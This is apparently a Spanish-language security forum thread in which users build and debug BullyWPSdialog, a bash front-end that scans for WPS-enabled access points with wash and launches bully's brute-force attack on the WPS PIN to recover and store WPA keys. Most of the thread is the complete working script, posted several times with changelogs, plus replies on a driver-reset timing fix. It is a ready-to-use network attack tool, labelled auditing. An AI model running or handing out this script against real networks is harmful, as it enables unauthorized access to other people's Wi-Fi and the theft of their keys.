xterm  -hold -fg FloralWhite -bg DarkBlue -T "Bully -> $ESSID" -e \
bully -F -b $BSSID -c $CANAL -v 3 $PIN_WPS $NO_CHECKSUM -N $INTERFACE_MON & BULLY_PID=$!

# Diálogo que aparecerá mientras se ejecuta el ataque
dialog --backtitle "$BACKTITLE" \
       --infobox "$INFO_AP\nSe ha puesto en marcha el ataque con bully,
                 presiona \"Control+C\" para detener el proceso.\n " 16 49
      
# Si se presiona "Control+C", se detiene el proceso de bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT

# Mientras el proceso de bully esté activo, el script estrá "durmiendo"
while [ -e "/proc/$BULLY_PID" ]; do
sleep 2
done

# Obtenemos el PIN y clave WPA
obtener_clave_wpa

# Salvamos PIN y clave en un archivo
salvar_clave_wpa

}

# Función seleccionar objetivo
seleccionar_objetivo() {

# Si no se encuentran objetivos, no se puede continuar
if [ ! "$(cat "$TMP/wash_scan.txt")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
      --ok-label "Volver al menú" \
      --msgbox "\nNo se ha encontrado ningún objetivo con WPS activado.\n " 0 0
menu
fi

# Creamos el menú para seleccionar objetivo
N=1
cat "$TMP/wash_scan.txt"|while read MAC CANAL PWR VER LOCK ESSID; do
if [ "$LOCK" = "Yes" ]; then LOCK="Si"; fi
echo "\"$N)\" \"$MAC    $LOCK       $CANAL     $(($PWR+100))    $ESSID\" \\"
N=$(($N+1))
done >"$TMP/menu_objetivos.txt"

# Diálogo para seleccionar objetivo
dialog --backtitle "$BACKTITLE" \
       --title " SELECCIONAR OBJETIVO " \
       --cancel-label "Volver al menú" \
       --menu "\n              BSSID        Locked   Canal   PWR    ESSID" 0 0 0 \
       --file "$TMP/menu_objetivos.txt" \
2>"$TMP/seleccion.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Definimos los parámetros que se le pasarán a bully
SELECCION=$(cat "$TMP/seleccion.txt")
ESSID="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|cut -d' ' -f22-)"
BSSID="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|awk '{print $2}')"
CANAL="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|awk '{print $4}')"

# Comprobamos si la clave ya ha sido obtenida anteriormente
if [ -e "$KEYS/$(echo "$BSSID"|tr ':' '-').txt" ]; then
WPS_PIN="$(cat "$KEYS/$(echo "$BSSID"|tr ':' '-').txt"|grep "PIN WPS:"|awk '{print $3}')"
CLAVE_WPA="$(cat "$KEYS/$(echo "$BSSID"|tr ':' '-').txt"|grep "CLAVE WPA:"|awk '{print $3}')"
else
obtener_clave_wpa
fi

# Si la clave ya ha diso obtenida anteriormente, la mostramos en el menú,
# en caso contrario mostramos solo la información básica
if [ "$CLAVE_WPA" ]; then
menu --InfoAP --InfoWPA
else
menu --InfoAP
fi
}

# Función escanear con wash en busca de objetivos con WPS activado
escanear_wps() {

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Diálogo para introducir tiempo a escanear
dialog --backtitle "$BACKTITLE" \
       --title " ESCANEAR EN BUSCA DE OBJETIVOS " \
       --cancel-label "Volver al menú" \
       --max-input "2" \
       --inputbox "\nIntroduce el tiempo a escanear en segundos: \n " 0 0 \
2>"$TMP/segundos.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Si no se introduce un valor numérico, no se puede continuar
if [ ! "$(cat "$TMP/segundos.txt"|grep "^[0-9]*$")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " ERROR " \
      --msgbox "\nDebes introducir un valor numérico\n " 0 0
escanear_wps
fi

# Matámos proceso de wash para evitar conflictos
killall wash >/dev/null 2>&1

# Escaneamos con wash
wash -i $INTERFACE_MON -C -D 2>/dev/null|tail -n +3|grep -v "^$" >"$TMP/wash_scan.txt" &

# Diálogo que muestra barra de progreso mientras se escanea
N2=$(cat "$TMP/segundos.txt")
N1=1
while [ ! $(($N1-1)) -eq $N2 ]; do
PORCENT=$(($(($N1*100))/$N2))
echo $PORCENT
sleep 1
N1=$(($N1+1))
done|\
dialog --backtitle "$BACKTITLE" \
       --title " ESCANEANDO EN BUSCA DE OBJETIVOS " \
       --gauge "" 0 0 \
2>/dev/null

# Cuando pasa el tiempo programado, terminamos el rpoceso de wash
killall wash >/dev/null 2>&1
sleep 1

# Saltamos a la funcion seleccionar objetivo
seleccionar_objetivo
}

# Función seleccionar interface y poner en modo monitor
seleccionar_interface() {

# Si no se encuentra ninguna tarjeta wifi, no se puede continuar
if [ ! "$(iwconfig 2>/dev/null|cut -d' ' -f1|grep -v "^$")" ]; then
dialog --backtitle "$BACKTITLE" \
      --title " NO SE PUEDE CONTINUAR " \
               --ok-label "Salir" \
               --msgbox "\nNo se ha detectado ninguna tarjeta wifi en este equipo.\n " 0 0
exit 1
fi

# Creamos el menú para seleccionar la interface
N=1
airmon-ng 2>/dev/null|egrep -v "^Interface|^$"|cut -d'-' -f1|\
while read INTERFACE CHIPSET MODELO DRIVER; do
if [ "$(iwconfig 2>/dev/null|grep "^$INTERFACE"|grep -v "Mode:Monitor")" ]; then
echo "\"$N\" \"$INTERFACE       $CHIPSET $MODELO      $DRIVER\" \\"
N=$(($N+1))
fi
done >"$TMP/menu_interfaces.txt"

# Diálogo para seleccionar interface
dialog --backtitle "$BACKTITLE" \
       --title " SELECCIONAR INTERFACE " \
       --cancel-label "Salir" \
       --menu "\n       Interface   Chipset            Driver" 0 0 0 \
       --file "$TMP/menu_interfaces.txt" \
2>"$TMP/seleccion.txt"

# Si dialog no devuelve el valor 0, salimos.
if [ ! $? = 0 ]; then exit 1; fi

SELECCION="$(cat "$TMP/seleccion.txt")"
INTERFACE="$(cat "$TMP/menu_interfaces.txt"|tr -d '"'|tr -d '\\'|grep ^$SELECCION|awk '{print $2}')"

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Se reinicia el driver de la interface seleccionada para evitar conflictos
reset_iface

# Ponemos la interface seleccionada en modo monitor
airmon-ng start $INTERFACE >"$TMP/log_airmon-ng.txt" 2>&1

# Si hay algún error al poner la interface en modo monitor no se puede continuar
if [ ! $? = 0 ]; then
dialog --backtitle "$BACKTITLE" \
               --title " ERROR " \
               --ok-label "Salir" \
               --textbox "$TMP/log_airmon-ng.txt" 0 0
        reset_iface; exit 1
fi

# Definimos interface en modo monitor
INTERFACE_MON="$(cat "$TMP/log_airmon-ng.txt"|grep "monitor mode enabled"|tr -d ')'|awk '{print $5}')"

dialog --backtitle "$BACKTITLE" \
       --infobox "\nSe utilizará $INTERFACE_MON en modo monitor\n " 0 0
sleep 3

# Saltámos al menú principal
menu
}

# Yeah Niroz was here, computePIN by ZaoChunsheng, C portado a bash
wps_pin_checksum() {
  acum=0
  PIN_p2=0

  while [ $pin -gt 0 ]; do
    acum=$(($acum + (3 * ($pin % 10))))
    pin=$(($pin / 10))
    acum=$(($acum + ($pin % 10)))
    pin=$(($pin / 10))
  done

  result=$(((10 - ($acum % 10)) % 10))
  PIN_p2=$(($result % 10000000))
}

# Función menú principal
menu() {

# Información del objetivo
INFO_AP="
$(if [ "$1" = "--InfoAP" ]; then
echo "\n\n        INFORMACIÓN DEL OBJETIVO\n"
echo "   ************************************  \n"
echo "      ESSID: $ESSID\n"
echo "      BSSID: $BSSID\n"
echo "      Canál: $CANAL\n"
if [ "$2" = "--InfoWPA" ]; then
echo "    PIN WPS: $WPS_PIN\n"
echo "  Clave WPA: $CLAVE_WPA\n"
echo "   ************************************  \n\n"
else
echo "   ************************************  \n\n"
fi
fi)"

# Diálogo con opciones del menú principal
dialog --backtitle "$BACKTITLE" \
       --title " MENU PRINCIPAL " \
       --cancel-label "Salir" \
       --menu "$INFO_AP\nSelecciona una opción:" 0 0 0 \
     "1)" "Escanear en busca de objetivos" \
     "2)" "Comenzar ataque de fuerza bruta" \
     "3)" "Probar un PIN específico" \
     "4)" "Seleccionar otro objetivo" \
2>"$TMP/seleccion.txt"

# Si dialog no devuelve el valor 0, salimos
if [ ! $? = 0 ]; then reset_iface; exit 1; fi

# Dependiendo de la opción elegida, se llama a la función correspondiente
case $(cat "$TMP/seleccion.txt"|tr -d ')') in
1 ) escanear_wps;;
2 ) bully_wps --InfoAP;;
3 ) bully_wps --InfoAP --Pin;;
4 ) seleccionar_objetivo;;
esac
}

# Si existe la ruta $TMP y no es un directorio se elimina
if [ -e "$TMP" ] && [ ! -d "$TMP" ]; then rm -rf "$TMP"; fi

# Si no existe la ruta $TMP la creamos
if [ ! -d "$TMP" ]; then mkdir -p "$TMP"; fi

# Comienza el script seleccionando la interface
seleccionar_interface

« Última modificación: 26-09-2013, 10:14 (Jueves) por geminis_demon »

La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #50 en: 26-09-2013, 10:35 (Jueves) »
Bueno pues a ver..


lo que ocurre ( creo que era eso desde el principio ) es que se le da la orden de reset y monta inmediatamente despues y al driver no le daba tiempo a remontar el vuelo.



Código: [Seleccionar]
# Se reinicia el driver de la interface seleccionada para evitar conflictos
reset_iface

si en esa linea..justo debajo le damos un simple sleep 2 se resuelve el problema.


# Se reinicia el driver de la interface seleccionada para evitar conflictos
reset_iface
sleep 2



Creo que era eso desde el principio ...


Ahora si , ..genero antes de lanzarlo 3 o 4 interfaces en monitor ...y ahora si desaparecen , ...claro que el driver lo tumbamos a base de bien  ;D


SIN EL SLEEP NO PIRULAAAA  , en mi equipo con un sleep 2 vale ,pero no se si talvez un sleep 3 para asegurar la jugada.

« Última modificación: 26-09-2013, 10:39 (Jueves) por USUARIONUEVO »

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2377
  • Prácticas precisas precisan práctica
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #51 en: 26-09-2013, 10:43 (Jueves) »
Ok, bueno pues como se llama a la función varias veces, para no poner el sleep  cada vez que se llame a la función, meto el sleep dentro de la función. He puesto uno después de desmontar el driver y otro después de volver a montarlo.

A ver que tal va:

Código: [Seleccionar]
#!/bin/bash

# VERSION 0.1  12/09/2013
# -----------------------
# - Fecha de salida
#
# VERSION 0.2  12/09/2013
# -----------------------
# - Solucionado bug con ESSIDs que contengan espacios (Warcry)
#
# VERSION 0.3  13/09/2013
# -----------------------
# - Añadido parametro -N para que las ralink no fallen. (USUARIONUEVO)
#
# VERSION 0.4  13/09/2013
# -----------------------
# - Añadido parametro -F para evitar warnings si cambiamos de ataque secuencial a random o viceversa.
#  (USUARIONUEVO)
#
# VERSION 0.5  19/09/2013
# -----------------------
# - Añadido parámetro -hold para que no se cierre la xterm en caso de que se produzca algún error.
# - Solucionado problema que impedía leer la clave WPA del log de bully.
# - Se sustituye la función de desmontar interfaces en modo monitor por la de desmontar y volver
#   a montar el driver de la interface (es mas efectivo).
# - Ahora al seleccionar objetivo, se comprueba si la clave ya se ha obtenido anteriormente y
#   en caso afirmativo, se muestra la clave junto con la información del objetivo.
#
# VERSION 0.6  24/09/2013
# -----------------------
# - Modificada funciona de reseteo de interface para añadir al final un ifconfig up
# - Ahora se "resetea" la interface también al salir del script.
#
# VERSION 0.7  24/09/2013
# -----------------------
# - Solucionado bug que probocaba que se quedara el PIN "fijado"
#   en el ataque de fuerza bruta habiendo realizado anteriormente
#   un ataque introduciendo un PIN especifico.
# - Solucionado un error ortográfico.
#
# VERSION 0.8  25/09/2013
# -----------------------
# - Mejorada la función de detectar driver ya que no identificaba correctamnete
#   los drivers ath5k, ath9k y WiLink.



# Variables globales
SCRIPT="BullyWPSdialog"
VERSION="0.8.1 Beta"
BACKTITLE="$SCRIPT $VERSION - By geminis_demon - SeguridadWireless.Net"
TMP="/tmp/$SCRIPT"
KEYS="$HOME/swireless/$SCRIPT/Keys"

# Función que obtiene PIN y clave WPA del log de bully
obtener_clave_wpa() {

# En caso de que el retun de bully no sea 0, de da por echo que no se ha obtenido la clave
if [ "$(tail -n 2 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|grep "signal 0$")" ]; then

# Se parsea el log de bully para obtener el PIN y la clave WPA
WPS_PIN="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|tr ':' ' '|awk '{print $2}')"
CLAVE_WPA="$(tail -n 1 "$HOME/.bully/$( echo $BSSID|tr '[:upper:]' '[:lower:]').run"|tr ':' ' '|awk '{print $4}')"

# Si el BSSID objetivo cumple con el CheckSum,
# este se calcula para saber cual es el último dígito del PIN
# (ya podría venir el PIN completo en el log de bully ¬¬)
if [ ! "$NO_CHECKSUM" ]; then
WPS_PIN=$(echo $WPS_PIN|cut -b 1,2,3,4,5,6,7)
pin=$WPS_PIN
wps_pin_checksum
WPS_PIN=$WPS_PIN$PIN_p2
fi
else
WPS_PIN=""
CLAVE_WPA=""
fi

}

# Función que desmonta y vuelve a montar el driver de la interface seleccionada
reset_iface() {

if [ "$INTERFACE" ]; then

# Identificamos el driver de la interface seleccionada
DRIVER="$(basename "$(ls -l "/sys/class/net/$INTERFACE/device/driver")")"
if [ "$(echo "$DRIVER"|grep "ath9k")" ]; then
DRIVER="ath9k $DRIVER"
elif [ "$(echo "$DRIVER"|grep "ath5k")" ]; then
DRIVER="ath5k $DRIVER"
elif [ ! "$DRIVER" ] && [ -d "/sys/class/net/tiwlan0/wireless" ]; then
DRIVER="WiLink"
fi

# Se desmonta y se vuelve a montar el driver
for X in $DRIVER; do
rmmod -f "$X"       >/dev/null 2>&1
done
sleep 1
for X in $DRIVER; do
modprobe "$X"       >/dev/null 2>&1
done
sleep 1

# Se pone la interface "up" para evitar problemas
# con algunos adaptadores inalámbricos
ifconfig "$INTERFACE" up >/dev/null 2>&1
fi

}

# Función comprobar si la interface está asociada a un punto de acceso
comprobacion_interface_asociada() {

# Si la interface está asociada, no se puede continuar
if [ ! "$(iwconfig $INTERFACE|grep "Not-Associated")" ]; then
dialog --backtitle "$BACKTITLE" \
       --title " NO SE PUEDE CONTINUAR " \
       --ok-label "Salir" \
       --msgbox "\nPara evitar errores, la interface $INTERFACE \
                no debe estar asociada a un punto de acceso.\n " 0 0
exit 1
fi
}

# Función salvar clave WPA
salvar_clave_wpa() {

# Si no se ha obtenido la clave WPA, informamos de ello y volvemos al menú
if [ ! "$CLAVE_WPA" ]; then
dialog --backtitle "$BACKTITLE" \
       --title " PROCESO COMPLETADO " \
       --ok-label "Volver al menú" \
       --msgbox "\nNo ha sido posible obtener la clave WPA\n " 0 0
       
# Si dialog no devuelve el valor 0, salimos
if [ $? != 0 ]; then
reset_iface; exit 1
fi

menu --InfoAP
fi

# Si existe la ruta $KEYS y no es un directorio se elimina
if [ -e "$KEYS" ] && [ ! -d "$KEYS" ]; then rm -rf "$KEYS"; fi

# Si no existe la ruta $KEYS la creamos
if [ ! -d "$KEYS" ]; then mkdir -p "$KEYS"; fi

# Salvamos la clave en un archivo de texto
NOMBRE="$ESSID_$(echo "$BSSID"|tr ':' '-')"
cat << EOF >"$TMP/$NOMBRE.key"
    ESSID: $ESSID
    BSSID: $BSSID
  PIN WPS: $WPS_PIN
CLAVE WPA: $CLAVE_WPA
EOF

# Convertimos el texto a formato windows
cat "$TMP/$NOMBRE.key"|sed -e 's/$/\r/' >"$KEYS/$NOMBRE.txt"

# Diálogo que informa donde se ha guardado la clave WPA
dialog --backtitle "$BACKTITLE" \
       --title " PROCESO COMPLETADO " \
       --ok-label "Volver al menú" \
       --msgbox "\n¡Se han obtenido con exito clave WPA! \
                \nLa clave ha sido guardada en: \n\n$KEYS/$NOMBRE.txt" 0 0

# Saltamos al menú principal
menu --InfoAP --InfoWPA
}

# Función lanzar ataque de fuerza bruta con bully
bully_wps() {

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Si no se ha seleccionado ningún objetivo no se puede continuar
if [ ! "$ESSID" -o ! "$BSSID" ]; then
dialog --backtitle "$BACKTITLE" \
       --title " NO SE PUEDE CONTINUAR " \
       --ok-label "Volver al menú" \
       --msgbox "\nNo se ha seleccionado ningún objetivo\n " 0 0
menu
fi

# Si el BSSID corresponde con 8C:0C:A3, el PIN no cumple con el CheckSum
if [ "$(echo "$BSSID"|cut -d':' -f1,2,3)" = "8C:0C:A3" ]; then
NO_CHECKSUM="-B"
LONGITUD_PIN="8"
else
NO_CHECKSUM=""
LONGITUD_PIN="7"
fi

# Si se ha elejido la opción de introducir PIN manualmente, mostramos el diálogo para introducir el pin
if [ "$1" = "--Pin" -o "$2" = "--Pin" ]; then
dialog --backtitle "$BACKTITLE" \
       --title " INTRODUCIR PIN MANUALMENTE " \
       --cancel-label "Volver al menú" \
       --max-input "$LONGITUD_PIN" \
       --inputbox "\nIn troduce el PIN con un máximo de $LONGITUD_PIN dígitos:" 0 0 \
2>"$TMP/PIN_WPS.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Si no se intruduce un valor numérico, no se puede continuar
if [ ! "$(cat "$TMP/PIN_WPS.txt"|grep "^[0-9]*$")" ]; then
dialog --backtitle "$BACKTITLE" \
       --title " ERROR " \
       --msgbox "\nDebes introducir un valor numérico\n " 0 0
bully_wps --InfoAP --Pin
fi

# Guardamos en una variable el PIN junto con los parámetros para bully
PIN_WPS="-S -p $(cat "$TMP/PIN_WPS.txt")"
else
PIN_WPS=""
fi

# Lanzamos ataque con bully
xterm  -hold -fg FloralWhite -bg DarkBlue -T "Bully -> $ESSID" -e \
bully -F -b $BSSID -c $CANAL -v 3 $PIN_WPS $NO_CHECKSUM -N $INTERFACE_MON & BULLY_PID=$!

# Diálogo que aparecerá mientras se ejecuta el ataque
dialog --backtitle "$BACKTITLE" \
       --infobox "$INFO_AP\nSe ha puesto en marcha el ataque con bully,
                 presiona \"Control+C\" para detener el proceso.\n " 16 49
       
# Si se presiona "Control+C", se detiene el proceso de bully
trap 'kill $BULLY_PID >/dev/null 2>&1' SIGINT

# Mientras el proceso de bully esté activo, el script estrá "durmiendo"
while [ -e "/proc/$BULLY_PID" ]; do
sleep 2
done

# Obtenemos el PIN y clave WPA
obtener_clave_wpa

# Salvamos PIN y clave en un archivo
salvar_clave_wpa

}

# Función seleccionar objetivo
seleccionar_objetivo() {

# Si no se encuentran objetivos, no se puede continuar
if [ ! "$(cat "$TMP/wash_scan.txt")" ]; then
dialog --backtitle "$BACKTITLE" \
       --title " NO SE PUEDE CONTINUAR " \
       --ok-label "Volver al menú" \
       --msgbox "\nNo se ha encontrado ningún objetivo con WPS activado.\n " 0 0
menu
fi

# Creamos el menú para seleccionar objetivo
N=1
cat "$TMP/wash_scan.txt"|while read MAC CANAL PWR VER LOCK ESSID; do
if [ "$LOCK" = "Yes" ]; then LOCK="Si"; fi
echo "\"$N)\" \"$MAC    $LOCK       $CANAL     $(($PWR+100))    $ESSID\" \\"
N=$(($N+1))
done >"$TMP/menu_objetivos.txt"

# Diálogo para seleccionar objetivo
dialog --backtitle "$BACKTITLE" \
       --title " SELECCIONAR OBJETIVO " \
       --cancel-label "Volver al menú" \
       --menu "\n              BSSID        Locked   Canal   PWR    ESSID" 0 0 0 \
       --file "$TMP/menu_objetivos.txt" \
2>"$TMP/seleccion.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Definimos los parámetros que se le pasarán a bully
SELECCION=$(cat "$TMP/seleccion.txt")
ESSID="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|cut -d' ' -f22-)"
BSSID="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|awk '{print $2}')"
CANAL="$(cat "$TMP/menu_objetivos.txt"|tr -d '"'|tr -d '\\'|grep "^$SELECCION"|awk '{print $4}')"

# Comprobamos si la clave ya ha sido obtenida anteriormente
if [ -e "$KEYS/$(echo "$BSSID"|tr ':' '-').txt" ]; then
WPS_PIN="$(cat "$KEYS/$(echo "$BSSID"|tr ':' '-').txt"|grep "PIN WPS:"|awk '{print $3}')"
CLAVE_WPA="$(cat "$KEYS/$(echo "$BSSID"|tr ':' '-').txt"|grep "CLAVE WPA:"|awk '{print $3}')"
else
obtener_clave_wpa
fi

# Si la clave ya ha diso obtenida anteriormente, la mostramos en el menú,
# en caso contrario mostramos solo la información básica
if [ "$CLAVE_WPA" ]; then
menu --InfoAP --InfoWPA
else
menu --InfoAP
fi
}

# Función escanear con wash en busca de objetivos con WPS activado
escanear_wps() {

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Diálogo para introducir tiempo a escanear
dialog --backtitle "$BACKTITLE" \
       --title " ESCANEAR EN BUSCA DE OBJETIVOS " \
       --cancel-label "Volver al menú" \
       --max-input "2" \
       --inputbox "\nIntroduce el tiempo a escanear en segundos: \n " 0 0 \
2>"$TMP/segundos.txt"

# Si el comando anterior no devuelve el valor 0, volvemos al menú
if [ ! $? = 0 ]; then menu; fi

# Si no se introduce un valor numérico, no se puede continuar
if [ ! "$(cat "$TMP/segundos.txt"|grep "^[0-9]*$")" ]; then
dialog --backtitle "$BACKTITLE" \
       --title " ERROR " \
       --msgbox "\nDebes introducir un valor numérico\n " 0 0
escanear_wps
fi

# Matámos proceso de wash para evitar conflictos
killall wash >/dev/null 2>&1

# Escaneamos con wash
wash -i $INTERFACE_MON -C -D 2>/dev/null|tail -n +3|grep -v "^$" >"$TMP/wash_scan.txt" &

# Diálogo que muestra barra de progreso mientras se escanea
N2=$(cat "$TMP/segundos.txt")
N1=1
while [ ! $(($N1-1)) -eq $N2 ]; do
PORCENT=$(($(($N1*100))/$N2))
echo $PORCENT
sleep 1
N1=$(($N1+1))
done|\
dialog --backtitle "$BACKTITLE" \
       --title " ESCANEANDO EN BUSCA DE OBJETIVOS " \
       --gauge "" 0 0 \
2>/dev/null

# Cuando pasa el tiempo programado, terminamos el rpoceso de wash
killall wash >/dev/null 2>&1
sleep 1

# Saltamos a la funcion seleccionar objetivo
seleccionar_objetivo
}

# Función seleccionar interface y poner en modo monitor
seleccionar_interface() {

# Si no se encuentra ninguna tarjeta wifi, no se puede continuar
if [ ! "$(iwconfig 2>/dev/null|cut -d' ' -f1|grep -v "^$")" ]; then
dialog --backtitle "$BACKTITLE" \
       --title " NO SE PUEDE CONTINUAR " \
               --ok-label "Salir" \
               --msgbox "\nNo se ha detectado ninguna tarjeta wifi en este equipo.\n " 0 0
exit 1
fi

# Creamos el menú para seleccionar la interface
N=1
airmon-ng 2>/dev/null|egrep -v "^Interface|^$"|cut -d'-' -f1|\
while read INTERFACE CHIPSET MODELO DRIVER; do
if [ "$(iwconfig 2>/dev/null|grep "^$INTERFACE"|grep -v "Mode:Monitor")" ]; then
echo "\"$N\" \"$INTERFACE       $CHIPSET $MODELO      $DRIVER\" \\"
N=$(($N+1))
fi
done >"$TMP/menu_interfaces.txt"

# Diálogo para seleccionar interface
dialog --backtitle "$BACKTITLE" \
       --title " SELECCIONAR INTERFACE " \
       --cancel-label "Salir" \
       --menu "\n       Interface   Chipset            Driver" 0 0 0 \
       --file "$TMP/menu_interfaces.txt" \
2>"$TMP/seleccion.txt"

# Si dialog no devuelve el valor 0, salimos.
if [ ! $? = 0 ]; then exit 1; fi

SELECCION="$(cat "$TMP/seleccion.txt")"
INTERFACE="$(cat "$TMP/menu_interfaces.txt"|tr -d '"'|tr -d '\\'|grep ^$SELECCION|awk '{print $2}')"

# Se comprueba que la interface no esté asociada
comprobacion_interface_asociada

# Se reinicia el driver de la interface seleccionada para evitar conflictos
reset_iface

# Ponemos la interface seleccionada en modo monitor
airmon-ng start $INTERFACE >"$TMP/log_airmon-ng.txt" 2>&1

# Si hay algún error al poner la interface en modo monitor no se puede continuar
if [ ! $? = 0 ]; then
dialog --backtitle "$BACKTITLE" \
               --title " ERROR " \
               --ok-label "Salir" \
               --textbox "$TMP/log_airmon-ng.txt" 0 0
        reset_iface; exit 1
fi

# Definimos interface en modo monitor
INTERFACE_MON="$(cat "$TMP/log_airmon-ng.txt"|grep "monitor mode enabled"|tr -d ')'|awk '{print $5}')"

dialog --backtitle "$BACKTITLE" \
       --infobox "\nSe utilizará $INTERFACE_MON en modo monitor\n " 0 0
sleep 3

# Saltámos al menú principal
menu
}

# Yeah Niroz was here, computePIN by ZaoChunsheng, C portado a bash
wps_pin_checksum() {
  acum=0
  PIN_p2=0

  while [ $pin -gt 0 ]; do
    acum=$(($acum + (3 * ($pin % 10))))
    pin=$(($pin / 10))
    acum=$(($acum + ($pin % 10)))
    pin=$(($pin / 10))
  done

  result=$(((10 - ($acum % 10)) % 10))
  PIN_p2=$(($result % 10000000))
}

# Función menú principal
menu() {

# Información del objetivo
INFO_AP="
$(if [ "$1" = "--InfoAP" ]; then
echo "\n\n        INFORMACIÓN DEL OBJETIVO\n"
echo "   ************************************  \n"
echo "      ESSID: $ESSID\n"
echo "      BSSID: $BSSID\n"
echo "      Canál: $CANAL\n"
if [ "$2" = "--InfoWPA" ]; then
echo "    PIN WPS: $WPS_PIN\n"
echo "  Clave WPA: $CLAVE_WPA\n"
echo "   ************************************  \n\n"
else
echo "   ************************************  \n\n"
fi
fi)"

# Diálogo con opciones del menú principal
dialog --backtitle "$BACKTITLE" \
       --title " MENU PRINCIPAL " \
       --cancel-label "Salir" \
       --menu "$INFO_AP\nSelecciona una opción:" 0 0 0 \
      "1)" "Escanear en busca de objetivos" \
      "2)" "Comenzar ataque de fuerza bruta" \
      "3)" "Probar un PIN específico" \
      "4)" "Seleccionar otro objetivo" \
2>"$TMP/seleccion.txt"

# Si dialog no devuelve el valor 0, salimos
if [ ! $? = 0 ]; then reset_iface; exit 1; fi

# Dependiendo de la opción elegida, se llama a la función correspondiente
case $(cat "$TMP/seleccion.txt"|tr -d ')') in
1 ) escanear_wps;;
2 ) bully_wps --InfoAP;;
3 ) bully_wps --InfoAP --Pin;;
4 ) seleccionar_objetivo;;
esac
}

# Si existe la ruta $TMP y no es un directorio se elimina
if [ -e "$TMP" ] && [ ! -d "$TMP" ]; then rm -rf "$TMP"; fi

# Si no existe la ruta $TMP la creamos
if [ ! -d "$TMP" ]; then mkdir -p "$TMP"; fi

# Comienza el script seleccionando la interface
seleccionar_interface


La luz cree que viaja más rápido que cualquier otra cosa, pero se equivoca; da lo mismo lo rápido que pueda viajar, porque al final, la luz descubre que la oscuridad ha llegado antes que ella, y la está esperando.

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #52 en: 26-09-2013, 10:43 (Jueves) »
PD


si quieres simplificar el tumbar driver ...


solo era necesario tumbar el que nos pedia..el ath9k_htc .osea , estaba todo bien desde el principio ... pero nos falto el sleep.


lo digo por que en los equipos con una atheros pci , le tumbaremos tambien la interface que solo usa ath9k


asi que , mejor volver a simplificar , ...y el sleep 2

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #53 en: 26-09-2013, 10:45 (Jueves) »
voy a probarlo y te digo , pero el problema viene de lanzar


reset iface   e inmediatamente despues el airmon-ng .... y tal vez cuando lanzas el airmon ..el driver aun no remonto ...y menos con los sleep dentro de la funcion...por que aun tardara mas el remontaje.

hay que retardar el airmon-ng start

pruebo y te digo.

Desconectado USUARIONUEVO

  • Colaborador
  • *
  • Mensajes: 14715
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #54 en: 26-09-2013, 10:49 (Jueves) »
el apaño de la ultima que pones funciona perfectamente.


ahora ya si no es demasiada molestia y encontrado el error , casi mejor no tocar mas que el driver que se nos indica.


ath9k_htc

y dejar el otro tranquilo ...por que basta con solo ath9k_htc

Desconectado geminis_demon

  • Colaborador
  • *
  • Mensajes: 2377
  • Prácticas precisas precisan práctica
Re: BullyWPSdialog - Interface dialog para auditar WPS con bully
« Respuesta #55 en: 26-09-2013, 11:00 (Jueves) »
Ok, pues si va todo bien lo pongo ya en el post principal con versión 0.8.1

Código: [Seleccionar]
#!/bin/bash

# VERSION 0.1  12/09/2013
# -----------------------
# - Fecha de salida
#
# VERSION 0.2  12/09/2013
# -----------------------
# - Solucionado bug con ESSIDs que contengan espacios (Warcry)
#
# VERSION 0.3  13/09/2013
# -----------------------
# - Añadido parametro -N para que las ralink no fallen. (USUARIONUEVO)
#
# VERSION 0.4  13/09/2013
# -----------------------
# - Añadido parametro -F para evitar warnings si cambiamos de ataque secuencial a random o viceversa.
#  (USUARIONUEVO)
#
# VERSION 0.5  19/09/2013
# -----------------------
# - Añadido parámetro -hold para que no se cierre la xterm en caso de que se produzca algún error.
# - Solucionado problema que impedía leer la clave WPA del log de bully.
# - Se sustituye la función de desmontar interfaces en modo monitor por la de desmontar y volver
#   a montar el driver de la interface (es mas efectivo).
# - Ahora al seleccionar objetivo, se comprueba si la clave ya se ha obtenido anteriormente y
#   en caso afirmativo, se muestra la clave junto con la información del objetivo.
#
# VERSION 0.6  24/09/2013
# -----------------------
# - Modificada funciona de reseteo de interface para añadir al final un ifconfig up
# - Ahora se "resetea" la interface también al salir del script.
#
# VERSION 0.7  24/09/2013
# -----------------------
# - Solucionado bug que probocaba que se quedara el PIN "fijado"
#   en el ataque de fuerza bruta habiendo realizado anteriormente
